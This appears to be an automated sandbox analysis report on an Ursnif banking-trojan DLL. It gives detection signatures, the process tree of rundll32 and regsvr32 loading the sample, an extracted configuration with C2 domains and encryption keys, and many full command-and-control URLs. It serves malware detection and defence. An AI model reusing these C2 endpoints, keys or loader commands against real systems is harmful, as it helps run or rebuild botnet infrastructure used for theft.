Play interactive tour

Edit tour

Analysis Report 1.dll

Overview

General Information

Sample Name:	1.dll
Analysis ID:	429332
MD5:	27955775dfd73e08550fa42f20a8ef14
SHA1:	69e19132abbe882d20d5cde2927ce0ae1c928457
SHA256:	23e30ba8de300b7a8d53acdefa9bdee1e607a965f4dd3c42b9385f408d6e77a8
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

System process connects to network (likely due to code injection or exploit)

Yara detected Ursnif

Machine Learning detection for sample

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Queries the installation date of Windows

Registers a DLL

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7132 cmdline: loaddll32.exe 'C:\Users\user\Desktop\1.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 7148 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\1.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6044 cmdline: rundll32.exe 'C:\Users\user\Desktop\1.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 7160 cmdline: regsvr32.exe /s C:\Users\user\Desktop\1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

iexplore.exe (PID: 6300 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 588 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4488 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5452 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17436 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6820 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17444 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5832 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17452 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 684 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17460 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5408 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17464 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 7120 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83012 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6432 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17482 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 1836 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17490 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 2740 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83032 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4588 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17512 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6980 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17520 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5128 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17528 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6772 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83064 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6956 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17542 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

rundll32.exe (PID: 4240 cmdline: rundll32.exe C:\Users\user\Desktop\1.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "oGIIttJEUG45fjge5YNkLrvYjNyFXbFRzSUVTLJ7ftnTBJeHa2ZI+8ADq/WBkIJIyCZesL4aCXkn94wRRQ+tyr9e0y5MNR+ULzq+nAiRWvNfXvT0196sjqB6oFsOPlfwaMOP2DaMNxkmh21TgkvcUJqABJ3I8EQwRxrH+GedjRzgdjdjn/y9cwZ+MJQXG/FtyJTTUBPyEwS1yqvDVH4ENtPcf7Smqshl2XQUQYeiwggvRSDgbKAnYWofz4wrekkGXVEh+BA8Mxud/zukujDjiLfV18ssQriJ1N4K2x41+2gCMUV+ZsGwVTthv8RdZbUH76oBxr/zfUiirDYNENpKEaOVbtYGJzUVmqZ2E7MzhEQ=", "c2_domain": ["authd.feronok.com", "raw.pablowilliano.at"], "botnet": "4500", "server": "580", "serpent_key": "58Pw0UfuGfpVnkTA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.948292780.0000000004E98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.784548777.0000000000AD0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000005.00000003.948361474.0000000004E98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.924061110.00000000052C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.948383297.0000000004E98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.924111198.00000000052C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1021984816.00000000037F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.948140417.0000000004E98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1021661815.00000000037F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.948411963.0000000004E98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.924023449.00000000052C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.834584319.0000000005298000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1021969620.00000000037F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.948218371.0000000004E98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.923759658.00000000052C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.1069724529.0000000005298000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.834728970.0000000005298000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.948264474.0000000004E98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1021951611.00000000037F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1021715602.00000000037F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.1097599278.0000000005298000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.923586250.00000000052C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.923924528.00000000052C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.834525873.0000000005298000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.785832858.0000000000410000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.789858287.0000000000AB0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.1021915260.00000000037F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.834645544.0000000005298000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.784546208.0000000000960000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.834791862.0000000005298000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.834491785.0000000005298000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.923995924.00000000052C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.948327739.0000000004E98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.834773952.0000000005298000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.834682087.0000000005298000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.924095906.00000000052C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1021871881.00000000037F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1021806353.00000000037F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 4240	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 7160	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6044	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 36 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.6d4a0000.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.6d4a0000.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.6d4a0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.regsvr32.exe.ad8cfa.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.3.rundll32.exe.418cfa.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.968cfa.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.loaddll32.exe.ab8cfa.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.6d4a0000.6.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 3 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://raw.pablowilliano.at/5rrnAaWEJjP00b_2B56737/B1AfZAlhUgHoA/b2t_2BN4/l5OkLy1VlWuDrrdEILRWWeb/E6W61j9yq8/abuhFDsODTcGxVnWQ/E_2BE3e1OTvy/3WD7TSUbyOm/cpm4396P_2Fjd0/pOy7riIEzmJp_2FxZmWLM/gNpof3_2FnlsfWUd/1743QqIgg_2FQRu/ZKVtHnC8C1xvmv_2B8/vHh2F1obc/m3eV0F3yYMczZiknu1Ew/H6Bi_2BTSpyXLXazxZH/wg8NqLvm2lSF1HlaU3pANa/1U6Z_2BZLYJJ_/2BlaNQcq/ledo9CFvcm_2F6MjGWcFo9L/RAKX4mmp_2/F_2FxtA6ZOAujrSBZ/4yu9h7z	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/eRS3IPULaBVyyyM8SI7NTjn/bu9jriHj6t/_2BkcuH0S0KLaBS3B/vkCN9MDcpDQw/CXvn1Uc9Lk5/eTvtAYmWtMxfAC/IbcZg8p7Nqfw4xi6JFwgY/iX8lYPiI0RfUKruW/cRS7MvLhOTcIXvx/A_2F5SdmT8BNOtLhIu/P7uLQkYdw/iuMR5Z51enQS4ZwsoBTP/Dtp84_2B7PB4d6Ih_2F/AlW2oiOiFE_2FnyCSEdY9y/vWCqa6t9PLYnR/oBTHljmW/b1W1259HTZYZTaG9O2900Q0/yz_2FOFMzC/llouIHAJZHwF3f0aR/_2FSLB7YfaTL/BdH925d4dS3/7iDYe3o7fiS/Pl	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/sX4dtwL7bay/rzZGwpnfzczFz3/LsBuX9huxqt_2FdLEMzat/b0BQWHIzHX0afe_2/FzCUWE	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/tTVUy7Cis4PjZzw3zlK90/992fZ2V2UadpUOjx/ZlFfFNzzz_2BNMC/rw9ORkrACS_2FSnAjs/_2FkBi36_/2BcKHehCiVzJ0ZlxZwUe/L605o3IJbqARL43QjWI/5xKrHdjyff8x2rKCgmO7Mu/SD9GyKc_2FBsi/PnW3TDEt/vmXdCw3sFAveNrYKm6TcRex/ohSiZG5THC/3RxSnoz2RW1R2SJHo/_2BwMcdQnslY/eZbgGLoqDt1/hcHL1ijHz1HAC4/B1wguCo7y8KJKFrVLMood/ADnIvNjKfSqFXvOX/vfzJTRrlv1hKd_2/FiJ_2B9pSc20z1/m	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/V0Zdil_2B8IErAOIy/9Ot8_2B759bg/T54gq_2BJbB/fEKg5_2BdBbLTl/sPD_2B_2FnvdcE	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/favicon.ico	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/dgzEbQ4OdHi6vrZ8TXtj/42P6D_2FQzGJBqjHjxr/k7tYCNr_2BHR8cgUzK_2Bs/fZKbEnCTwoi	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/hmMzQKK9IpZemMI/AV6w9eELu1YSVPBd2B/U2fmYepaP/iI8O34L03l282SsJYJjt/THEo6G77t	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/fNUjDf7_2/FCXdH_2BoIzulRdpyRrN/VegwLwgBgX3FZ3e7Kml/JNpfVfiUw9hrvE_2BrMey8/9KmQXXHW4gs3a/9wgniy83/wKdGA8aJWZ5vZIo_2FiHAUb/zP0hJ_2BZH/ieJtaC2qsJk3_2Fow/0ttQYgmKdzve/ExwbYpZnP5c/82RPIPzJe1gOLF/_2BRc7ZeEUGg3SmE1TpuS/gPPWxB_2BjL0KDQa/cEkcJSpFensONz2/JuZCF1CCARKPWeUk_2/FvcrH8CIA/yx05ZSmlcDL9ZKkPz_2F/hnEgW0PJ8VaXmVS3OM5/DCOZcdQW8DmkgDTa3ilYTz/BNbEyiVfi1Qod/CczdZH_2BY/L	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/eRS3IPULaBVyyyM8SI7NTjn/bu9jriHj6t/_2BkcuH0S0KLaBS3B/vkCN9MDcpDQw/CXvn1U	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/fNUjDf7_2/FCXdH_2BoIzulRdpyRrN/VegwLwgBgX3FZ3e7Kml/JNpfVfiUw9hrvE_2BrMey	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/1rDskZrGyxwYpYn35/qL0_2BW8aSJn/Xmy8O6y_2F1/vAFFg5sXvrqV3E/5sQNlqY_2FlVqYGBdfPFn/U_2FpF45FRVvtng0/CHSrG3ox4kKO6nz/fa8Bk9I48YJ2mibVvx/L_2Bqol7c/tsQwCAooqkWn6gPAbSWl/QD3zhXOtMzYL6Ym04zh/5_2FgybkUk94HZTf6olCIq/9FN98evTn58b0/8CSSre_2/Bu6Ikb6rwvx1DWohv5RLt4o/e_2BWF_2Bc/d5_2Fp_2BgsUfGW3Y/Tgn5X_2Fo_2B/ZZIMFZgAKXa/ZNoVGytLkCHCdG/XBDYst2ree/Zgtmz5W2Tq8P/H	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/5Fz54n1eAYCx6AoO/trrrFlnJO43_2BT/_2B9XA2Pfv_2FjB9cX/4bvHDQr_2/Fcc1l6ZYgU	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/tTVUy7Cis4PjZzw3zlK90/992fZ2V2UadpUOjx/ZlFfFNzzz_2BNMC/rw9ORkrACS_2FSnAjs/_	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/ATiL3P87_2FBLJR/BC5BJn8dyTtQ6ffd5W/0yM3sHqjA/PUUhyvXz10qPy3rbOoEV/mxXTz5GEf_2FJ1a_2BK/ZfrLOk2W31qhtbg9JWUwPE/hN5bUcB50eKT_/2BNd8E_2/FZi_2BFfGni4E2JjnbevSKB/8h9tWV54XR/zR1VMEFW8ZFskTIvF/Gph5WUak2QX5/sVOcmn1nNvc/RnK_2B00CLgf0I/K7lgIJJ7sya5Al4fACOfm/BvxQs3fAG6a0MebC/NKtDiZMQRT60IUJ/f0dP0RsUXiNDqIW54v/LL56Tq1vM/s_2FlHH5u86U7q76_2Ft/4GmpUkuUY0whYNq9pWf/DCuUzAdQ/8	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/1rDskZrGyxwYpYn35/qL0_2BW8aSJn/Xmy8O6y_2F1/vAFFg5sXvrqV3E/5sQNlqY_2FlV	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/L_2BDt9ytUk/uJ29Pz3DiT6ki3/08jXqEr2Bw1VZtjZ7PHMr/mkp8mx2j_2Fh_2BM/48r5Iz6Z2	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/ds3WDeXoOEmk7Y/QQuMPDNsrQWDpsNbTxUBm/9C_2Ffsfwo9FuQBR/xjorKLEJMlfL0A2/CNDB50xXgmy2p4EWxn/DaMjDghfb/cWK8m8ncHHGRZhGMepDc/nDGGUvCSKIWD73abwqz/PSlYxoNGoul9uvoUM2lkYp/iUEvsJec7I6HC/9f5WLr8u/422hTa5FmMbzsZrrYeL5ZCh/Hr1urRNWuy/StfzJRwO7PFWr_2Ft/9TWK1WqIM09Q/q8nrTS3QqnI/jfRzgUIatEJnmp/MqYnHLVMk2JoJoUVcpg0A/FnIEAZIY/9xBtC9wkdw5/g	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/ATiL3P87_2FBLJR/BC5BJn8dyTtQ6ffd5W/0yM3sHqjA/PUUhyvXz10qPy3rbOoEV/mxXTz5GEf	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/5Fz54n1eAYCx6AoO/trrrFlnJO43_2BT/_2B9XA2Pfv_2FjB9cX/4bvHDQr_2/Fcc1l6ZYgUI7p_2FiVc6/t_2Fl8EaBR1HS_2BNK5/X8y72xR2qjkHaZyrNERbO7/v2peyintdJ24L/Yw8tw7QT/dLXZu5OFhvWbL455USn4LnJ/HMP0smJj_2/FZwXFbprpV3aJCWuX/15bJnANkFNAX/hVoXLTlCLIU/tXHaEx0muHiXJx/btyId5nqGgZC05fEhjIaO/rm6z0UiaoPx_2FiX/TGKuABuP8srX2Ck/eUAi3TXKVNasxDo0P3/laW2oibPa/zBY4kInj1Zn68Xf49Wvw/7KJZdF0VpEe/P	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/OH175Zchtr5XCiZumX3nwAg/_2FAbOw7Yf/Z3HrOA2tCuHkK0wx_/2BSl8k36vM_2/BmUwT9vi5ds/IzgeuD6q87gFwZ/84qOsYKFhKxVr6L0Cag3l/PL1RiNFP_2BXA4Cd/ksDe_2BH0hSy4qr/ZjPn7VhnaRpwImnOZ4/d0Piqs_2F/AJoXR13SZzOA0tqrByvJ/vMFrOLoWX0owBj80j0g/nPQR2b2kCMyMldOZ2WWvYd/aoe4QO8ibbCp3/q_2Bre6L/dJzbiZ3n5z4pEwkiyFez6gn/uNwx7h8FiM/chP3D4vmodPyh8n0y/tjNup8GzZEvE/7l7rBmGdOaq/dgKOoGhW3lw/NG	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/V0Zdil_2B8IErAOIy/9Ot8_2B759bg/T54gq_2BJbB/fEKg5_2BdBbLTl/sPD_2B_2F	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_2Fb8S	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/favicon.ico	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/5rrnAaWEJjP00b_2B56737/B1AfZAlhUgHoA/b2t_2BN4/l5OkLy1VlWuDrrdEILRWWeb/E6	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/ds3WDeXoOEmk7Y/QQuMPDNsrQWDpsNbTxUBm/9C_2Ffsfwo9FuQBR/xjorKLEJMlfL0	Avira URL Cloud: Label: malware
Source: http://raw.pablowilliano.at/OH175Zchtr5XCiZumX3nwAg/_2FAbOw7Yf/Z3HrOA2tCuHkK0wx_/2BSl8k36vM_2/BmUwT9	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_2Fb8SL1e_2Bcy1brJLJ_/2BjovsduMdCqU0x4/GQVR4nMtPLQI34Q/jvoS0v2ZfIuYqB_2F9/H14dXc2_2/Bjq_2BEdNrJJI2sl8dBd/0EXv2jUPwYTVqmYCs_2/BvSZuMChVtYZMZS6DsVwap/yVgW08_2Ff8kL/trSm6I_2/FftLBTNnGuYda0Kts3xBoIq/hS7V_2FgQN/zYOOceAjlTgUyD0tU/GveuM_2F9QKt/Dw_2BirtM_2/B5GjUkddBSdTKK/gGHOev3Y5/fKlghW	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000002.00000003.784548777.0000000000AD0000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "oGIIttJEUG45fjge5YNkLrvYjNyFXbFRzSUVTLJ7ftnTBJeHa2ZI+8ADq/WBkIJIyCZesL4aCXkn94wRRQ+tyr9e0y5MNR+ULzq+nAiRWvNfXvT0196sjqB6oFsOPlfwaMOP2DaMNxkmh21TgkvcUJqABJ3I8EQwRxrH+GedjRzgdjdjn/y9cwZ+MJQXG/FtyJTTUBPyEwS1yqvDVH4ENtPcf7Smqshl2XQUQYeiwggvRSDgbKAnYWofz4wrekkGXVEh+BA8Mxud/zukujDjiLfV18ssQriJ1N4K2x41+2gCMUV+ZsGwVTthv8RdZbUH76oBxr/zfUiirDYNENpKEaOVbtYGJzUVmqZ2E7MzhEQ=", "c2_domain": ["authd.feronok.com", "raw.pablowilliano.at"], "botnet": "4500", "server": "580", "serpent_key": "58Pw0UfuGfpVnkTA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for domain / URL

Show sources

Source: authd.feronok.com	Virustotal: Detection: 10%			Perma Link
Source: raw.pablowilliano.at	Virustotal: Detection: 9%			Perma Link

Machine Learning detection for sample

Show sources

Source: 1.dll

Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_007A35A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

2_2_007A35A1

Source: 1.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2

Source: 1.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\Whole\Stead\716\Enough\Pitch.pdb source: loaddll32.exe, 00000000.00000002.1096853134.000000006D4E8000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1098259470.000000006D4E8000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1098045536.000000006D4E8000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1097456266.000000006D4E8000.00000002.00020000.sdmp, 1.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4E0B15 FindFirstFileExW,	0_2_6D4E0B15
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_007A4E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_007A4E9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4E0B15 FindFirstFileExW,	2_2_6D4E0B15
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4E0B15 FindFirstFileExW,	3_2_6D4E0B15
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4E0B15 FindFirstFileExW,	5_2_6D4E0B15

Source: Joe Sandbox View	IP Address: 104.20.185.68 104.20.185.68
Source: Joe Sandbox View	IP Address: 87.248.118.22 87.248.118.22
Source: Joe Sandbox View	IP Address: 87.248.118.22 87.248.118.22

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

